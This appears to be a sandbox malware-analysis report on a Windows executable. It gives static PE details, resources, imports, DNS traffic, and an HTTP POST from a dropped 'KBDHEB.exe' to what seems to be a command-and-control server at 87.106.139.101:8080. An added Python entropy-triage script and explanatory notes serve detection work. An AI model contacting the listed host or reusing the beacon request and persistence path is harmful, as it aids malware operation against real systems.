                                                                                                                File size:262144
                                                                                                                MD5:b12817c1c8ba085a7a82655fba90e53d
                                                                                                                SHA1:1f56268ada7ef3e7b788121cfa2ca1879cf70f1e
                                                                                                                SHA256:61e37534bfb2acbb787788100b1932f5011cbc98db86ce10b7a8a730d2a4de35
                                                                                                                SHA512:788a14c7f1bd001650f9eb01f9d7031bd99853bbb4de5a62b88c4c28bf60f5118a5b6884387c8880388dd3ba78b87caa312e3b82f8351db41befbb8b76aac672
                                                                                                                SSDEEP:3072:2mxrb7sso1HoShS2HMulmfuLjQaWtpbVKF7iqaiNWLKtOw+P2TwXRVoQoedsfVYp:hgp1lhS2HzmfuvMpAF7ihAL+Kpe0YcJ+
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./.ozk..)k..)k..)..^)l..)..\)~..)k..)...)L<|)r..)L<l)...)L<o)...)L<})j..)L<y)j..)Richk..)........................PE..L....|.^...

                                                                                                                File Icon

                                                                                                                Icon Hash:71b018ccc6577131

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x412929
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x5EDA7CAD [Fri Jun 5 17:11:09 2020 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:e422d76403c4c9011b9b8b6b69b469b3

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                call 00007FD6E0B49C9Dh
                                                                                                                jmp 00007FD6E0B43B0Bh
                                                                                                                push 00000000h
                                                                                                                push dword ptr [esp+14h]
                                                                                                                push dword ptr [esp+14h]
                                                                                                                push dword ptr [esp+14h]
                                                                                                                push dword ptr [esp+14h]
                                                                                                                call 00007FD6E0B49D15h
                                                                                                                add esp, 14h
                                                                                                                ret
                                                                                                                mov eax, dword ptr [esp+04h]
                                                                                                                xor ecx, ecx
                                                                                                                cmp eax, dword ptr [0042EBC8h+ecx*8]
                                                                                                                je 00007FD6E0B43D04h
                                                                                                                inc ecx
                                                                                                                cmp ecx, 2Dh
                                                                                                                jl 00007FD6E0B43CE3h
                                                                                                                lea ecx, dword ptr [eax-13h]
                                                                                                                cmp ecx, 11h
                                                                                                                jnbe 00007FD6E0B43CFEh
                                                                                                                push 0000000Dh
                                                                                                                pop eax
                                                                                                                ret
                                                                                                                mov eax, dword ptr [0042EBCCh+ecx*8]
                                                                                                                ret
                                                                                                                add eax, FFFFFF44h
                                                                                                                push 0000000Eh
                                                                                                                pop ecx
                                                                                                                cmp ecx, eax
                                                                                                                sbb eax, eax
                                                                                                                and eax, ecx
                                                                                                                add eax, 08h
                                                                                                                ret
                                                                                                                call 00007FD6E0B48BC2h
                                                                                                                test eax, eax
                                                                                                                jne 00007FD6E0B43CF8h
                                                                                                                mov eax, 0042ED30h
                                                                                                                ret
                                                                                                                add eax, 08h
                                                                                                                ret
                                                                                                                call 00007FD6E0B48BAFh
                                                                                                                test eax, eax
                                                                                                                jne 00007FD6E0B43CF8h
                                                                                                                mov eax, 0042ED34h
                                                                                                                ret
                                                                                                                add eax, 0Ch
                                                                                                                ret
                                                                                                                push esi
                                                                                                                call 00007FD6E0B43CDCh
                                                                                                                mov ecx, dword ptr [esp+08h]
                                                                                                                push ecx
                                                                                                                mov dword ptr [eax], ecx
                                                                                                                call 00007FD6E0B43C82h
                                                                                                                pop ecx
                                                                                                                mov esi, eax
                                                                                                                call 00007FD6E0B43CB5h
                                                                                                                mov dword ptr [eax], esi
                                                                                                                pop esi
                                                                                                                ret
                                                                                                                call 00007FD6E0B47516h
                                                                                                                push dword ptr [esp+04h]
                                                                                                                call 00007FD6E0B4736Dh
                                                                                                                push dword ptr [0042ED38h]
                                                                                                                call 00007FD6E0B489E3h
                                                                                                                push 000000FFh
                                                                                                                call eax
                                                                                                                add esp, 0Ch

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [RES] VS2005 build 50727
                                                                                                                • [ C ] VS2005 build 50727
                                                                                                                • [LNK] VS2005 build 50727
                                                                                                                • [C++] VS2005 build 50727
                                                                                                                • [ASM] VS2005 build 50727

                                                                                                                Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2c734          0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x34000          0xf2d4        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x28cb0          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x25000          0x40c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x2c6ac          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x234bb       0x24000   False     0.560607910156   data       6.58324580938  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x25000          0x8cc4        0x9000    False     0.327446831597   data       4.91487847156  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x2e000          0x5b1c        0x2000    False     0.308471679688   data       3.92934474844  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x34000          0xf2d4        0x10000   False     0.807495117188   data       7.27970364915  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
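The Sections table is the static check that matters most on a sample like this one: a .rsrc section at entropy 7.28 and ZLIB complexity 0.81, filling 0xf2d4 of its 0x10000 raw bytes, next to a 6.6-entropy .text, is the usual profile of a loader that carries a compressed or encrypted payload as a resource. The Python script below, added here as an example and not part of the Joe Sandbox report or its tooling, reproduces that check from raw bytes with only the standard library: it walks the COFF and section headers, computes Shannon entropy per section's raw data, decodes the timestamp and file characteristics, and flags high-entropy sections and sections that are both writable and executable. It runs on a constructed minimal PE (build_sample_pe, hypothetical; the COFF field values are copied from the report, the section contents are synthetic) and the 7.0 entropy threshold is an assumption.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# COFF file-header characteristics (winnt.h) that the report lists for this sample.
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}

# Section characteristics (winnt.h) relevant to triage.
SCN_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}

# Assumed triage threshold: sections at or above this entropy are treated as
# compressed/encrypted content (the report's .rsrc scores 7.28).
HIGH_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in table.items() if value & bit]


def triage_pe(pe: bytes) -> dict:
    """Parse the COFF header and section table of a PE image and score each section."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", pe, coff)
    first_hdr = coff + 20 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(nsect):
        (name, vsize, va, raw_size, raw_ptr,
         _, _, _, _, scn_chars) = struct.unpack_from("<8sIIIIIIHHI", pe, first_hdr + 40 * i)
        ent = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": ent,
            "characteristics": flag_names(scn_chars, SCN_FLAGS),
            # Two independent red flags: packed/encrypted content, and W+X memory.
            "high_entropy": ent >= HIGH_ENTROPY,
            "writable_and_executable": bool(scn_chars & 0x80000000) and bool(scn_chars & 0x20000000),
        })
    return {
        "machine": machine,
        "timestamp": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
        "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "sections": sections,
    }


def suspicious_sections(report: dict) -> list:
    """Names of sections that trip either red flag."""
    return [s["name"] for s in report["sections"]
            if s["high_entropy"] or s["writable_and_executable"]]


def build_sample_pe() -> bytes:
    """Constructed (hypothetical) PE32: a low-entropy .text and a uniformly distributed .rsrc.
    COFF values mirror the report (i386, timestamp 0x5EDA7CAD, characteristics 0x0103)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                  # e_lfanew: PE header right after the DOS header
    opt = bytearray(224)                                   # PE32 optional header, mostly zero
    struct.pack_into("<H", opt, 0, 0x10B)                  # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x12929)               # AddressOfEntryPoint (report: 0x412929 - 0x400000)
    struct.pack_into("<I", opt, 28, 0x400000)              # ImageBase
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x5EDA7CAD, 0, 0, len(opt), 0x0103)
    text_raw = bytes(range(16)) * 32     # 512 bytes, 16 equiprobable values -> entropy exactly 4.0
    rsrc_raw = bytes(range(256)) * 2     # 512 bytes, all 256 values equiprobable -> entropy exactly 8.0
    text_hdr = struct.pack("<8sIIIIIIHHI", b".text", len(text_raw), 0x1000, len(text_raw), 0x200, 0, 0, 0, 0, 0x60000020)
    rsrc_hdr = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc_raw), 0x2000, len(rsrc_raw), 0x400, 0, 0, 0, 0, 0x40000040)
    image = bytearray(0x600)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text_hdr + rsrc_hdr
    image[:len(headers)] = headers
    image[0x200:0x400] = text_raw
    image[0x400:0x600] = rsrc_raw
    return bytes(image)


if __name__ == "__main__":
    rep = triage_pe(build_sample_pe())
    print("compiled:", rep["timestamp"], "|", ", ".join(rep["characteristics"]))
    for s in rep["sections"]:
        print(f"{s['name']:<8} VA=0x{s['virtual_address']:x} raw=0x{s['raw_size']:x} "
              f"entropy={s['entropy']:.2f} {'HIGH' if s['high_entropy'] else ''}")
    print("suspicious:", suspicious_sections(rep))
```

To run it against a real file, replace build_sample_pe() with open(path, "rb").read(); the headers parsed here are the same fields the report's Sections and Static PE Info tables are derived from. Entropy alone is not a verdict: legitimate binaries embed compressed images and signed installers pack their payload, so treat a hit as a reason to carve the resource and look inside, not as detection.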

                                                                                                                Resources

Name       RVA      Size   Type                  Language  Country
RT_CURSOR  0x34bb0  0x134  data                  English   United States
RT_CURSOR  0x34ce4  0xb4   data                  English   United States
RT_CURSOR  0x34d98  0x134  AmigaOS bitmap font   English   United States
RT_CURSOR  0x34ecc  0x134  data                  English   United States
RT_CURSOR  0x35000  0x134  data                  English   United States
RT_CURSOR  0x35134  0x134  data                  English   United States
RT_CURSOR  0x35268  0x134  data                  English   United States
RT_CURSOR  0x3539c  0x134  data                  English   United States
RT_CURSOR  0x354d0  0x134  data                  English   United States
RT_CURSOR  0x35604  0x134  data                  English   United States
RT_CURSOR  0x35738  0x134  data                  English   United States
RT_CURSOR  0x3586c  0x134  data                  English   United States
RT_CURSOR  0x359a0  0x134  AmigaOS bitmap font   English   United States
RT_CURSOR  0x35ad4  0x134  data                  English   United States
RT_CURSOR  0x35c08  0x134  data                  English   United States
RT_CURSOR  0x35d3c  0x134  data                  English   United States
RT_BITMAP  0x35e70  0xb8   data                  English   United States
RT_BITMAP  0x35f28  0x144  data                  English   United States
RT_ICON    0x3606c  0x2e8  dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676  English   United States
RT_ICON    0x36354  0x128  GLS_BINARY_LSB_FIRST  English   United States
RT_DIALOG  0x3647c  0x180  data                  English   United States
RT_DIALOG  0x365fc  0x504  data                  English   United States
RT_DIALOG  0x36b00  0xe8   data                  English   United States
RT_DIALOG  0x36be8  0x34   data                  English   United States
RT_STRING  0x36c1c  0x42   data                  English   United States
RT_STRING  0x36c60  0x82   data                  English   United States
RT_STRING  0x36ce4  0x2a   data                  English   United States
RT_STRING  0x36d10  0x192  data                  English   United States
RT_STRING  0x36ea4  0x4e2  data                  English   United States
RT_STRING  0x37388  0x31a  data                  English   United States
RT_STRING  0x376a4  0x2dc  data                  English   United States
RT_STRING  0x37980  0x8a   data                  English   United States

The Type column is libmagic's guess on the raw resource bytes. The "AmigaOS bitmap font", "dBase IV DBT" and "GLS_BINARY_LSB_FIRST" labels on cursor and icon entries are false matches on small binary blobs (each entry is the standard 0x134-byte cursor or small icon of an MFC resource set) and do not indicate embedded files of those formats.
                                                                                                                RT_STRING0x37a0c0xacdataEnglishUnited States
                                                                                                                RT_STRING0x37ab80xdedataEnglishUnited States
                                                                                                                RT_STRING0x37b980x4c4dataEnglishUnited States
                                                                                                                RT_STRING0x3805c0x264dataEnglishUnited States
                                                                                                                RT_STRING0x382c00x2cdataEnglishUnited States
                                                                                                                RT_STRING0x382ec0x42dataEnglishUnited States
                                                                                                                RT_RCDATA0x383300xa944dataEnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42c740x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42c980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42cac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42cc00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42cd40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42ce80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42cfc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d4c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_CURSOR0x42d9c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                                RT_GROUP_ICON0x42db00x22dataEnglishUnited States
                                                                                                                RT_VERSION0x42dd40x4a8dataEnglishUnited States
                                                                                                                RT_MANIFEST0x4327c0x56ASCII text, with CRLF line terminatorsEnglishUnited States

Imports

DLL | Import
KERNEL32.dll | SetErrorMode, HeapAlloc, HeapFree, HeapReAlloc, RaiseException, VirtualAlloc, RtlUnwind, GetCommandLineA, GetProcessHeap, GetStartupInfoA, ExitProcess, HeapSize, VirtualFree, HeapDestroy, HeapCreate, GetStdHandle, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetOEMCP, Sleep, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetACP, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetCPInfo, CreateFileA, GetThreadLocale, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, InterlockedDecrement, GetModuleFileNameW, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FreeResource, GetCurrentProcessId, GlobalAddAtomA, CloseHandle, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, LoadLibraryA, lstrcmpA, FreeLibrary, GlobalDeleteAtom, GetModuleHandleA, GetProcAddress, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, MulDiv, SetLastError, LocalAlloc, LocalLock, LocalFree, LocalUnlock, LoadLibraryExA, GetCurrentProcess, lstrlenA, CompareStringA, GetVersion, FindResourceA, LoadResource, LockResource, SizeofResource, GetLastError, WideCharToMultiByte, MultiByteToWideChar, IsDebuggerPresent, InterlockedExchange
USER32.dll | GetSysColorBrush, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, ShowWindow, SetWindowTextA, IsDialogMessageA, DestroyMenu, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, AdjustWindowRectEx, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetSystemMenu, MessageBoxA, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, UnregisterClassA, GetTopWindow, LoadCursorA, DrawIcon, AppendMenuA, SendMessageA, IsIconic, GetClientRect, LoadIconA, EnableWindow, GetSystemMetrics, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, PostQuitMessage, PostMessageA, CheckMenuItem, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, EnableMenuItem
GDI32.dll | SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, DeleteDC, GetStockObject, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, TextOutA, RectVisible, PtVisible, GetDeviceCaps, DeleteObject, SetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap
WINSPOOL.DRV | ClosePrinter, DocumentPropertiesA, OpenPrinterA
ADVAPI32.dll | RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
SHLWAPI.dll | PathFindFileNameA, PathFindExtensionA
OLEAUT32.dll | VariantClear, VariantChangeType, VariantInit

Version Infos

Description | Data
LegalCopyright | os Angeles County Sheriff's office has said it will no longer enforce a curfew put in place
InternalName | Rights group the American Civil Liberties Union
FileVersion | 18, 7, 2, 19
ProductName | The Minnesota County Attorneys Association voted Thursday
ProductVersion | 8, 2, 55, 17
FileDescription | South Africa's governing party said it is launching
OriginalFilename | Minnesota's county attorneys want to give the state attorney general the authority
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Feb 23, 2021 16:28:25.466500998 CET  60501        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:25.517323017 CET  53           60501      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:26.732745886 CET  53775        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:26.784442902 CET  53           53775      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:26.937232971 CET  51837        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:26.995768070 CET  53           51837      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:27.932770014 CET  55411        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:27.984055042 CET  53           55411      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:29.361210108 CET  63668        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:29.409859896 CET  53           63668      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:30.187025070 CET  54640        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:30.236861944 CET  53           54640      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:31.250220060 CET  58739        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:31.299065113 CET  53           58739      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:32.266169071 CET  60338        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:32.323358059 CET  53           60338      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:33.101047039 CET  58717        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:33.158937931 CET  53           58717      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:35.787468910 CET  59762        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:35.838629961 CET  53           59762      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:37.038021088 CET  54329        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:37.089829922 CET  53           54329      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:38.992897034 CET  58052        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:39.041843891 CET  53           58052      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:40.126162052 CET  54008        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:40.177434921 CET  53           54008      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:41.747036934 CET  59451        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:41.798511982 CET  53           59451      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:42.976083994 CET  52914        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:43.025271893 CET  53           52914      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:44.236706018 CET  64569        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:44.288336992 CET  53           64569      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:45.514019012 CET  52816        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:45.569581032 CET  53           52816      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:46.707571983 CET  50781        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:46.759145021 CET  53           50781      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:48.848829031 CET  54230        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:48.904294014 CET  53           54230      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:50.740236044 CET  54911        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:50.797322035 CET  53           54911      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:51.376462936 CET  49958        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:51.438911915 CET  53           49958      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:51.700440884 CET  50860        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:51.753202915 CET  53           50860      8.8.8.8          192.168.2.7
Feb 23, 2021 16:28:54.026443005 CET  50452        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:28:54.075861931 CET  53           50452      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:02.131201029 CET  59730        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:02.179775953 CET  53           59730      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:20.661921978 CET  59310        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:20.722384930 CET  53           59310      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:20.962333918 CET  51919        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:21.011264086 CET  53           51919      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:22.736326933 CET  64296        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:22.784879923 CET  53           64296      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:31.201035976 CET  56680        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:31.268256903 CET  53           56680      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:47.720910072 CET  58820        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:47.787590981 CET  53           58820      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:48.423604012 CET  60983        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:48.490135908 CET  53           60983      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:49.063095093 CET  49247        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:49.120388031 CET  53           49247      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:49.743591070 CET  52286        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:49.828109980 CET  53           52286      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:50.048021078 CET  56064        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:50.099646091 CET  53           56064      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:50.346640110 CET  63744        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:50.457186937 CET  53           63744      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:50.994074106 CET  61457        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:51.059099913 CET  53           61457      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:51.663366079 CET  58367        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:51.723073006 CET  53           58367      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:52.550688982 CET  60599        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:52.631799936 CET  53           60599      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:53.520988941 CET  59571        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:53.578318119 CET  53           59571      8.8.8.8          192.168.2.7
Feb 23, 2021 16:29:54.077132940 CET  52689        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:29:54.142081976 CET  53           52689      8.8.8.8          192.168.2.7
Feb 23, 2021 16:30:25.146941900 CET  50290        53         192.168.2.7      8.8.8.8
Feb 23, 2021 16:30:25.198834896 CET  53           50290      8.8.8.8          192.168.2.7

HTTP Request Dependency Graph

• 87.106.139.101
  • 87.106.139.101:8080

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.7  49752        87.106.139.101  8080              C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe

Timestamp                            kBytes transferred  Direction  Data
Feb 23, 2021 16:29:54.453563929 CET  10963               OUT        POST /bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/ HTTP/1.1
Referer: http://87.106.139.101/bU1xHhP1i5jVxZu/xvoUent/AXIzcbqj58Yqx42hBt/dnHR1wy6s3G/hhZqlzS/iQ7q56sdJjtJs1gO/
Content-Type: multipart/form-data; boundary=---------------------------270479976396707
